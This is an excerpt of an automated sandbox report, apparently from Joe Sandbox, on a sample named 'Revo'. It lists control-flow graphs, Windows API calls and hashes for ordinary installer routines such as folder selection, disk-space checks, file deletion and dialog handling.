                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                            • String ID: H'D${
                                                                                                                                                                            • API String ID: 590372296-3538427676
                                                                                                                                                                            • Opcode ID: 7fb9c064395b8d5c06d15c7ce8b1b0c6621f3944dcd12c6d8502cf874e2b8e07
                                                                                                                                                                            • Instruction ID: a946544cda80648ae215d749a1304cfc675a42e6d6c1d5f97ef9608d1157b9e3
                                                                                                                                                                            • Opcode Fuzzy Hash: 7fb9c064395b8d5c06d15c7ce8b1b0c6621f3944dcd12c6d8502cf874e2b8e07
                                                                                                                                                                            • Instruction Fuzzy Hash: 0DB16770800608FFDF11AFA0DD859AE3B78EB48354F10413AFA45BA1A0D7785A41DF69

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 381 404b12-404b3c 382 404b3e-404b4a call 405ce6 call 406950 381->382 383 404b4f-404b59 381->383 382->383 385 404bc7-404bce 383->385 386 404b5b-404b71 GetDlgItem call 405fe8 383->386 389 404bd4-404bdd 385->389 390 404ca5-404cac 385->390 397 404b83-404bbc SetWindowTextW call 404621 * 2 call 404656 call 406a96 386->397 398 404b73-404b7b call 40601c 386->398 393 404bf7-404bfc 389->393 394 404bdf-404bea 389->394 395 404cbb-404cd6 call 405ce6 call 406079 390->395 396 404cae-404cb5 390->396 393->390 401 404c02-404c44 call 4066df SHBrowseForFolderW 393->401 399 404bf0 394->399 400 404e53-404e65 call 404688 394->400 419 404cd8 395->419 420 404cdf-404cf7 call 4066a2 call 406a96 395->420 396->395 396->400 397->400 439 404bc2-404bc5 SHAutoComplete 397->439 398->397 417 404b7d-404b7e call 405f71 398->417 399->393 413 404c46-404c60 CoTaskMemFree call 405f71 401->413 414 404c9e 401->414 426 404c62-404c68 413->426 427 404c8a-404c9c SetDlgItemTextW 413->427 414->390 417->397 419->420 437 404d33-404d44 call 4066a2 call 40601c 420->437 438 404cf9-404cff 420->438 426->427 430 404c6a-404c81 call 4066df lstrcmpiW 426->430 427->390 430->427 441 404c83-404c85 lstrcatW 430->441 453 404d46 437->453 454 404d49-404d62 GetDiskFreeSpaceW 437->454 438->437 442 404d01-404d13 GetDiskFreeSpaceExW 438->442 439->385 441->427 444 404d15-404d17 442->444 445 404d8b-404da5 442->445 448 404d19 444->448 449 404d1c-404d31 call 405fbd 444->449 447 404da7 445->447 451 404dac-404db6 call 404faf 447->451 448->449 449->437 449->442 459 404dd1-404dda 451->459 460 404db8-404dbf 451->460 453->454 454->447 457 404d64-404d89 MulDiv 454->457 457->451 461 404e0c-404e16 459->461 462 404ddc-404dec call 404f97 459->462 460->459 463 404dc1 460->463 465 404e22-404e28 461->465 466 404e18-404e1f call 40140b 461->466 473 404dfe-404e07 SetDlgItemTextW 462->473 474 404dee-404df7 call 404ece 462->474 467 404dc3-404dc8 463->467 468 404dca 463->468 471 404e2a 465->471 472 404e2d-404e3e call 404643 465->472 466->465 467->459 467->468 468->459 471->472 479 404e40-404e46 472->479 480 404e4d 472->480 473->461 481 404dfc 474->481 479->480 482 404e48 call 404a6b 479->482 480->400 481->461 482->480
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404B61
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404B8B
                                                                                                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001,00000009,00000000,?,00000014,?,?,00000001,?), ref: 00404BC5
                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404C3C
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404C47
                                                                                                                                                                            • lstrcmpiW.KERNEL32(Remove folder: ,00442748,00000000,?,?), ref: 00404C79
                                                                                                                                                                            • lstrcatW.KERNEL32(?,Remove folder: ), ref: 00404C85
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C97
                                                                                                                                                                              • Part of subcall function 00405CE6: GetDlgItemTextW.USER32(?,?,00002000,00404CCE), ref: 00405CF9
                                                                                                                                                                              • Part of subcall function 00406950: CharNextW.USER32(?,*?|<>/":,00000000,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                                                                                                                                              • Part of subcall function 00406950: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                                                                                                                                              • Part of subcall function 00406950: CharNextW.USER32(?,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                                                                                                                                              • Part of subcall function 00406950: CharPrevW.USER32(?,?,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                                                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(C:\Program Files\,?,?,?,00000001,C:\Program Files\,?,?,000003FB,?), ref: 00404D0E
                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(C:\Program Files\,?,?,0000040F,?,C:\Program Files\,C:\Program Files\,?,00000001,C:\Program Files\,?,?,000003FB,?), ref: 00404D5A
                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D75
                                                                                                                                                                              • Part of subcall function 00404ECE: lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                                                                                                                                              • Part of subcall function 00404ECE: wsprintfW.USER32 ref: 00404F78
                                                                                                                                                                              • Part of subcall function 00404ECE: SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                            • String ID: A$C:\Program Files\$H'D$Remove folder:
                                                                                                                                                                            • API String ID: 4039761011-425954661
                                                                                                                                                                            • Opcode ID: 6e15f0ff5402f2575495af3f7f30cd26abeab5420aa242f492b7e6411a88d81d
                                                                                                                                                                            • Instruction ID: 631ab75ceab9e691d6259a87645379c0ec27aba7f5179a8718d2cd07d5d9f082
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e15f0ff5402f2575495af3f7f30cd26abeab5420aa242f492b7e6411a88d81d
                                                                                                                                                                            • Instruction Fuzzy Hash: 52A1A3B1900209ABDB11AFA5CD81AEF77B8FF84754F11843BF601B62D1DB7C89418B69

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 616 405dae-405dd4 call 406079 619 405dd6-405de8 DeleteFileW 616->619 620 405ded-405df4 616->620 621 405f6a-405f6e 619->621 622 405df6-405df8 620->622 623 405e07-405e17 call 4066a2 620->623 625 405f18-405f1d 622->625 626 405dfe-405e01 622->626 629 405e26-405e27 call 405fbd 623->629 630 405e19-405e24 lstrcatW 623->630 625->621 628 405f1f-405f22 625->628 626->623 626->625 631 405f24-405f2a 628->631 632 405f2c-405f34 call 4069ff 628->632 633 405e2c-405e30 629->633 630->633 631->621 632->621 640 405f36-405f4a call 405f71 call 405d66 632->640 636 405e32-405e3a 633->636 637 405e3c-405e42 lstrcatW 633->637 636->637 639 405e47-405e63 lstrlenW FindFirstFileW 636->639 637->639 641 405e69-405e71 639->641 642 405f0d-405f11 639->642 656 405f62-405f65 call 405727 640->656 657 405f4c-405f4f 640->657 645 405e91-405ea5 call 4066a2 641->645 646 405e73-405e7b 641->646 642->625 644 405f13 642->644 644->625 658 405ea7-405eaf 645->658 659 405ebc-405ec7 call 405d66 645->659 648 405ef0-405f00 FindNextFileW 646->648 649 405e7d-405e85 646->649 648->641 653 405f06-405f07 FindClose 648->653 649->645 654 405e87-405e8f 649->654 653->642 654->645 654->648 656->621 657->631 660 405f51-405f60 call 405727 call 406462 657->660 658->648 661 405eb1-405eba call 405dae 658->661 669 405ee8-405eeb call 405727 659->669 670 405ec9-405ecc 659->670 660->621 661->648 669->648 673 405ee0-405ee6 670->673 674 405ece-405ede call 405727 call 406462 670->674 673->648 674->648
                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,004BD000), ref: 00405DD7
                                                                                                                                                                            • lstrcatW.KERNEL32(00452750,\*.*,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E1F
                                                                                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E42
                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E48
                                                                                                                                                                            • FindFirstFileW.KERNEL32(00452750,?,?,?,0040A014,?,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E58
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EF8
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405F07
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                            • String ID: P'E$\*.*
                                                                                                                                                                            • API String ID: 2035342205-897026672
                                                                                                                                                                            • Opcode ID: a3f270a56088b8bf3b652a13f4333b5ab17183d1fc399bf265a2fc2ef0cf4556
                                                                                                                                                                            • Instruction ID: d3f7042800757c758c726763e218659af4e34a2018f279a2393577cf1f32b1c8
                                                                                                                                                                            • Opcode Fuzzy Hash: a3f270a56088b8bf3b652a13f4333b5ab17183d1fc399bf265a2fc2ef0cf4556
                                                                                                                                                                            • Instruction Fuzzy Hash: 5741D130800A05E6CB21AB61CD89ABF7678EF45755F14413FF881B11D1DB7C8A82DEAE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                                                                                                                                            • Instruction ID: 2c84522690a72e7b125efbdd79dcce5a6d58b8fc95eff680b6a5e34cc787ad25
                                                                                                                                                                            • Opcode Fuzzy Hash: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                                                                                                                                            • Instruction Fuzzy Hash: 5EF17670D04229CBDF28CFA8C8946ADBBB1FF44305F24856ED456BB281D7786A86CF45
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(74DF3420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0), ref: 00406A0A
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406A16
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                            • Opcode ID: c678162996fe6daf9e8ab4f1fec6b2103351496eed0ed7f1d1f24d988285780e
                                                                                                                                                                            • Instruction ID: 35f0ff7019ed0dad564a4e6eb4f1dd92456e0906ec704515d4596d21edce6ab9
                                                                                                                                                                            • Opcode Fuzzy Hash: c678162996fe6daf9e8ab4f1fec6b2103351496eed0ed7f1d1f24d988285780e
                                                                                                                                                                            • Instruction Fuzzy Hash: EDD012317551205BC241A73C6D0C89B7E589F1A3317118B37F46BF21E4D7348C628A9D
                                                                                                                                                                            APIs
                                                                                                                                                                            • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 542301482-0
                                                                                                                                                                            • Opcode ID: 123f68ff51714efecf9c4a00c9935eb00e482b4d0787b723755ae9dd217d2255
                                                                                                                                                                            • Instruction ID: 4ba496994b59718f24d5e00967c7d670fc4db519b0fd96db73d52b6c03ea5324
                                                                                                                                                                            • Opcode Fuzzy Hash: 123f68ff51714efecf9c4a00c9935eb00e482b4d0787b723755ae9dd217d2255
                                                                                                                                                                            • Instruction Fuzzy Hash: 5E411775A00209AFCB00DFE4C989AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                                                            • Opcode ID: ac6a53922a97e284df946da7801549c61c6641663f6eec0e2d2377e42d6a165f
                                                                                                                                                                            • Instruction ID: efe4a8e86551b5277c252534069081f49e8237aa630b9309e96070f066c2822a
                                                                                                                                                                            • Opcode Fuzzy Hash: ac6a53922a97e284df946da7801549c61c6641663f6eec0e2d2377e42d6a165f
                                                                                                                                                                            • Instruction Fuzzy Hash: A8F08271A04105EADB00EBE5D9599AEB378EF14314F20017BE111F31E5D7B88E509B29

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 200 404122-404134 201 40413a-404140 200->201 202 40429b-4042aa 200->202 201->202 203 404146-40414f 201->203 204 4042f9-40430e 202->204 205 4042ac-4042f4 GetDlgItem * 2 call 404621 SetClassLongW call 40140b 202->205 208 404151-40415e SetWindowPos 203->208 209 404164-40416b 203->209 206 404310-404313 204->206 207 40434e-404353 call 40466d 204->207 205->204 212 404315-404320 call 401389 206->212 213 404346-404348 206->213 222 404358-404373 207->222 208->209 215 40416d-404187 ShowWindow 209->215 216 4041af-4041b5 209->216 212->213 238 404322-404341 SendMessageW 212->238 213->207 221 4045ee 213->221 223 404288-404296 call 404688 215->223 224 40418d-4041a0 GetWindowLongW 215->224 218 4041b7-4041c9 DestroyWindow 216->218 219 4041ce-4041d1 216->219 226 4045cb-4045d1 218->226 228 4041d3-4041df SetWindowLongW 219->228 229 4041e4-4041ea 219->229 227 4045f0-4045f7 221->227 232 404375-404377 call 40140b 222->232 233 40437c-404382 222->233 223->227 224->223 234 4041a6-4041a9 ShowWindow 224->234 226->221 241 4045d3-4045d9 226->241 228->227 229->223 237 4041f0-4041ff GetDlgItem 229->237 232->233 235 404388-404393 233->235 236 4045ac-4045c5 DestroyWindow EndDialog 233->236 234->216 235->236 243 404399-4043e6 call 4066df call 404621 * 3 GetDlgItem 235->243 236->226 244 404201-404218 SendMessageW IsWindowEnabled 237->244 245 40421e-404221 237->245 238->227 241->221 242 4045db-4045e4 ShowWindow 241->242 242->221 272 4043f0-40442c ShowWindow KiUserCallbackDispatcher call 404643 KiUserCallbackDispatcher 243->272 273 4043e8-4043ed 243->273 244->221 244->245 247 404223-404224 245->247 248 404226-404229 245->248 250 404254-404259 call 4045fa 247->250 251 404237-40423c 248->251 252 40422b-404231 248->252 250->223 255 404272-404282 SendMessageW 251->255 257 40423e-404244 251->257 252->255 256 404233-404235 252->256 255->223 256->250 260 404246-40424c call 40140b 257->260 261 40425b-404264 call 40140b 257->261 268 404252 260->268 261->223 270 404266-404270 261->270 268->250 270->268 276 404431 272->276 277 40442e-40442f 272->277 273->272 278 404433-404461 GetSystemMenu EnableMenuItem SendMessageW 276->278 277->278 279 404463-404474 SendMessageW 278->279 280 404476 278->280 281 40447c-4044bb call 404656 call 404103 call 4066a2 lstrlenW call 4066df SetWindowTextW call 401389 279->281 280->281 281->222 292 4044c1-4044c3 281->292 292->222 293 4044c9-4044cd 292->293 294 4044ec-404500 DestroyWindow 293->294 295 4044cf-4044d5 293->295 294->226 297 404506-404533 CreateDialogParamW 294->297 295->221 296 4044db-4044e1 295->296 296->222 298 4044e7 296->298 297->226 299 404539-404590 call 404621 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 297->299 298->221 299->221 304 404592-4045a5 ShowWindow call 40466d 299->304 306 4045aa 304->306 306->226
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040415E
                                                                                                                                                                            • ShowWindow.USER32(?), ref: 0040417E
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404190
                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 004041A9
                                                                                                                                                                            • DestroyWindow.USER32 ref: 004041BD
                                                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041D6
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 004041F5
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404209
                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00404210
                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004042BB
                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 004042C5
                                                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 004042DF
                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404330
                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 004043D6
                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 004043F7
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404409
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404424
                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040443A
                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00404441
                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404459
                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040446C
                                                                                                                                                                            • lstrlenW.KERNEL32(00442748,?,00442748,00000000), ref: 00404496
                                                                                                                                                                            • SetWindowTextW.USER32(?,00442748), ref: 004044AA
                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 004045DE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Item$MessageSendShow$Long$CallbackDispatcherMenuUser$ClassDestroyEnableEnabledSystemTextlstrlen
                                                                                                                                                                            • String ID: H'D
                                                                                                                                                                            • API String ID: 3964124867-716976774
                                                                                                                                                                            • Opcode ID: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
                                                                                                                                                                            • Instruction ID: 87935a59af8161b0f78328c19d4fe10c51b4425a276279a6d07330ead90e7465
                                                                                                                                                                            • Opcode Fuzzy Hash: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
                                                                                                                                                                            • Instruction Fuzzy Hash: C4C1C2B1500604BBCB216F61EE85E2B3BA8FB85745F11097EFB41B11F0DB7998419B2E

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
